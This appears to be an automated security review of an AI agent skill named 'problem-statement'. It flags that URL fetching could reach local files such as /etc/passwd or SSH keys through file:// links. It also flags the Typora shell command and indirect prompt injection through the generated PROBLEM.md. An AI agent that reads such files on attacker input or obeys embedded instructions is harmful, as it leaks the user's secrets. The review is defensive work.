problem-statement

The skill problem-statement presents several security concerns:

1. EXTERNAL_DOWNLOADS / DATA_EXFILTRATION (HIGH): The instruction 'Document link: Fetch and extract relevant context' implies the ability to fetch content from arbitrary URLs. This is a high-risk capability. An attacker could provide a link to a malicious external resource, leading to the download of harmful content. More critically, if the underlying fetching mechanism supports file:// URLs, an attacker could instruct the skill to read sensitive local files (e.g., file:///etc/passwd, file://~/.ssh/id_rsa). While the skill does not explicitly state it exfiltrates this data, the ability to read arbitrary local files is a severe data exfiltration risk.

2. COMMAND_EXECUTION (HIGH): The skill explicitly executes the command open -a Typora PROBLEM.md. While the arguments (Typora and PROBLEM.md) are fixed in this instruction, the presence of direct command execution is a significant security capability. If an attacker could manipulate the application name or file path (e.g., through prompt injection or other means), it could lead to arbitrary command execution.

3. PROMPT_INJECTION (INFO): The skill takes user input to generate the PROBLEM.md file. If this generated markdown file is subsequently processed by an LLM or another tool, malicious instructions embedded in the user's input could lead to indirect prompt injection, influencing the behavior of the downstream system.

4. EXTERNAL_DOWNLOADS (LOW): The skill uses mcp__plugin_atlassian_atlassian__getJiraIssue to interact with Jira. Assuming mcp is a trusted internal agent mechanism, this is noted as an external interaction rather than an 'unverifiable dependency' in the traditional sense. However, it still represents an interaction with an external system.